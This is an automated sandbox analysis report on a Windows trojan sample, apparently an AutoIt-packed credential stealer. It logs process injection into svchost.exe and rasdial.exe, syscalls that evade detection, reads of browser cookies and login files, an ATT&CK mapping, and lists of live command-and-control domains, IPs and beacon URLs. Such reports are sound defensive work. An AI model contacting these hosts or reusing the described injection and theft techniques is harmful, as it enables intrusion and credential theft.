Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe protection: read write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Thread register set: target process: 6780
Source: C:\Windows\SysWOW64\rasdial.exe | Thread APC queued: target process: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AEE008
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006D8C93 LogonUserW
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_00683B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_00684A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006E4EF5 mouse_event
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\220204-TF1--00.exe"
Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe | Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
Source: C:\Windows\SysWOW64\rasdial.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: 220204-TF1--00.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 220204-TF1--00.exe, sXIYDUFnJY.exe, 00000005.00000000.1956178018.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4130232391.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098893955.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: sXIYDUFnJY.exe, 00000005.00000000.1956178018.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4130232391.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098893955.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: sXIYDUFnJY.exe, 00000005.00000000.1956178018.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4130232391.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098893955.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: sXIYDUFnJY.exe, 00000005.00000000.1956178018.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4130232391.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098893955.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006A886B cpuid
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006C2230 GetUserNameW
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_00684AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rasdial.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: 220204-TF1--00.exe | Binary or memory string: WIN_81
Source: 220204-TF1--00.exe | Binary or memory string: WIN_XP
Source: 220204-TF1--00.exe | Binary or memory string: WIN_XPe
Source: 220204-TF1--00.exe | Binary or memory string: WIN_VISTA
Source: 220204-TF1--00.exe | Binary or memory string: WIN_7
Source: 220204-TF1--00.exe | Binary or memory string: WIN_8
Source: 220204-TF1--00.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (a leading number is the count of matched signatures for that technique; techniques without a number were not observed)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1503946 | Sample: 220204-TF1--00.exe | Startdate: 04/09/2024 | Architecture: WINDOWS | Score: 100
Contacted hosts: www.jaxo.xyz, www.weep.site and 18 other IPs or domains (Performs DNS queries to domains with low reputation)
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
Process tree (indentation shows parent/child; "injected" marks a process written into rather than started):
220204-TF1--00.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    svchost.exe (started): Maps a DLL or memory area into another process
        sXIYDUFnJY.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
            rasdial.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                sXIYDUFnJY.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); contacts www.jaxo.xyz 66.29.149.180 (ports 49754, 49755, 49756; ADVANTAGECOMUS, United States), tadalaturbo.online 192.185.211.122 (ports 49786, 49787, 49788; UNIFIEDLAYER-AS-1US, United States) and 12 other IPs or domains
                firefox.exe (started)

Source | Detection | Scanner | Label
220204-TF1--00.exe | 29% | ReversingLabs | Win32.Trojan.Generic
220204-TF1--00.exe | 31% | Virustotal |
220204-TF1--00.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
            http://www.redhat.com/docs/manuals/enterprise/0%Avira URL Cloudsafe
            https://wordpress.org/0%Avira URL Cloudsafe
            http://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/0%Avira URL Cloudsafe
            http://www.tadalaturbo.online/7o3y/0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?56gD=FnaXBox540%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-10%Avira URL Cloudsafe
            http://www.551108k5.shop/0or4/0%Avira URL Cloudsafe
            https://mgmasistencia.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            https://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy0%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/?56gD=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.redhat.com/0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.ayypromo.shop | 176.57.64.102 | true | false | | unknown
tadalaturbo.online | 192.185.211.122 | true | false | | unknown
fontanerourgente.net | 37.187.158.211 | true | false | | unknown
weep.site | 194.233.65.154 | true | false | | unknown
www.cannulafactory.top | 18.183.3.45 | true | false | | unknown
www.anaidittrich.com | 162.55.254.209 | true | false | | unknown
gangli.ssywan.com | 64.64.237.133 | true | false | | unknown
www.xforum.tech | 103.224.182.242 | true | false | | unknown
www.datensicherung.email | 85.13.151.9 | true | false | | unknown
www.jaxo.xyz | 66.29.149.180 | true | true | | unknown
32wxd.top | 206.119.82.116 | true | false | | unknown
www.jiyitf.top | 104.21.35.73 | true | false | | unknown
www.onlytradez.club | 167.172.133.32 | true | false | | unknown
www.88nn.pro | 45.157.69.194 | true | false | | unknown
www.551108k5.shop | unknown | unknown | true | | unknown
www.taapbit.online | unknown | unknown | true | | unknown
www.tadalaturbo.online | unknown | unknown | true | | unknown
www.32wxd.top | unknown | unknown | true | | unknown
www.weep.site | unknown | unknown | true | | unknown
www.fontanerourgente.net | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.88nn.pro/l4rw/?56gD=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.anaidittrich.com/qpwk/ | false | Avira URL Cloud: safe | unknown
http://www.tadalaturbo.online/7o3y/?gTSpc=Khb8pT&56gD=34bWgTnU4AX1gKZq+j0JMo89G/eR8V4xUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UxrbVXfSA+Cuoh4JbcMUl7SslS3/OMRxqtpA= | false | Avira URL Cloud: safe | unknown
http://www.cannulafactory.top/l90v/ | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.ayypromo.shop/rgqx/ | false | Avira URL Cloud: safe | unknown
http://www.xforum.tech/647x/ | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.weep.site/v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pT | false | Avira URL Cloud: malware | unknown
http://www.xforum.tech/647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.onlytradez.club/zctj/ | false | Avira URL Cloud: safe | unknown
http://www.onlytradez.club/zctj/?56gD=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.32wxd.top/kyiu/ | false | Avira URL Cloud: safe | unknown
http://www.ayypromo.shop/rgqx/?56gD=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.jiyitf.top/uhl0/?56gD=ncGfyjKG78FJ3RoiM5vIj9c1hRDw+kHAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI8bXCzTYoePvJD/HBD8ObPaKNbBrKYFELLGg=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.88nn.pro/l4rw/ | false | Avira URL Cloud: safe | unknown
http://www.32wxd.top/kyiu/?56gD=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.fontanerourgente.net/t3gh/?56gD=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.datensicherung.email/gs9g/ | false | Avira URL Cloud: safe | unknown
http://www.jiyitf.top/uhl0/ | false | Avira URL Cloud: safe | unknown
http://www.jaxo.xyz/f9bc/ | false | Avira URL Cloud: safe | unknown
http://www.fontanerourgente.net/t3gh/ | false | Avira URL Cloud: safe | unknown
http://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
http://www.tadalaturbo.online/7o3y/ | false | Avira URL Cloud: safe | unknown
http://www.551108k5.shop/0or4/ | false | Avira URL Cloud: safe | unknown
http://www.cannulafactory.top/l90v/?56gD=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&gTSpc=Khb8pT | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mgmasistencia.com/acerca-de/ | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4 | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://mgmasistencia.com/ | sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/ | rasdial.exe, 00000006.00000002.4131381557.00000000068B8000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003B28000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://tilda.cc | rasdial.exe, 00000006.00000002.4131381557.0000000006726000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003996000.00000004.00000001.00040000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | rasdial.exe, 00000006.00000002.4131381557.0000000005904000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002B74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000317D4000.00000004.80000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4 | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://twitter.com/wordpress | rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
